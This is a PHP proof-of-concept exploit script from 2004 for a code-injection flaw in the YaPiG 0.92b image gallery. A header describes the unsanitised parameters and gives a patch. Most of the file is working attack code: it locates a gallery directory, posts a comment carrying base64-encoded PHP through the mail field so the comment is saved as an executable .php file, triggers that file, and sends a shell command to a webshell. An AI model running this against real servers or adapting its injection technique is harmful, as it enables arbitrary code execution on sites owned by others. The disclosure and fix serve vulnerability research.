#!/usr/bin/php 


<? 


/* 


        YaPiG 0.92b add_coment PHP Insertion Proof of Concept 
        By aCiDBiTS acidbitshotmail.com 07-August-2004 



        Description: 


        YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script. 
        This Proof of Concept creates a php file that echoes a notice. 
        First it determines a valid photo directory where to create the script. 
        Then creates a crafted comment saved in a new .php file. This comment 
        contains an encoded webshell. Once this .php file is opened, the code 
        contained creates test.php. 


        Usage (in my debian box): 
        php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b" 



        Vulnerability: 


        There is no user input sanization of some parameters in add_comment.php 
        and functions.php.This allows to create a file with any extension, and we 
can 
        insert any code in it. Version 0.92b is vulnerable, I haven't tested older 
ones. 



        Workaround. Modify this lines of code: 


        add_comment.php 
        line 105: 
                $comments_file= $gid_dir . $gid . "_" . $phid; 
        Modify with: 
                $comments_file= $gid_dir . $gid . "_" . intval($phid); 


        functions.php, construct_comment_line() 
        line 699-700: 
                $linea=$linea . $data_array['mail'] . $SEPARATOR; 
                $linea=$linea . $data_array['web'] . $SEPARATOR; 
        Modify with: 
                $linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR; 
                $linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR; 


*/ 



echo "+-------------------------------------------------------+\n| YaPiG 
0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS 
acidbitshotmail.com 07-August-2004 
|\n+-------------------------------------------------------+\n\n"; 


$websh="<?php 
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f); 
  ?>"; 


if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n"); 
$host=$argv[1]; 
if(substr($host,strlen($host)-1,1)!='/') $host.='/'; 


echo "[+] Getting valid gid & photo path ... "; 
$webc=get_web($host); 
$temp=explode(";gid=",$webc); 
$gid=intval($temp[1]); 
$temp=explode("photos/",$webc); 
$temp=explode("/",$temp[1]); 
$path=$temp[0]; 
if( !$gid || !$path ) die( "Failed!\n\n"); 
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n"; 


echo "[+] Creating notice script file ... "; 
send_post( $host."add_comment.php?gid=".$gid."&phid=.php", 
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send"); 
$webc=get_web( $host."photos/".$path."/".$gid."_.php" ); 
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm 
".$gid."_.php") ); 
echo "OK\n Now go to: ".$host."photos/".$path."/test.php"; 



die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\ 
//||\\\\\n\n"); 



function get_web($url) 
{ 
        $ch=curl_init(); 
        curl_setopt ($ch, CURLOPT_URL, $url); 
        curl_setopt ($ch, CURLOPT_HEADER, 0); 
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); 
        $data=curl_exec ($ch); 
        curl_close ($ch); 
        return $data; 
} 


function send_post($url,$data) 
{ 
        $ch=curl_init(); 
        curl_setopt ($ch, CURLOPT_URL, $url ); 
        curl_setopt ($ch, CURLOPT_HEADER, 0); 
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); 
        curl_setopt ($ch, CURLOPT_POST, 1); 
        curl_setopt ($ch, CURLOPT_POSTFIELDS, $data ); 
        $data=curl_exec ($ch); 
        curl_close ($ch); 
        return $data; 
} 


/* \ / 
                 (Oo) 
                //||\\ */ 


?>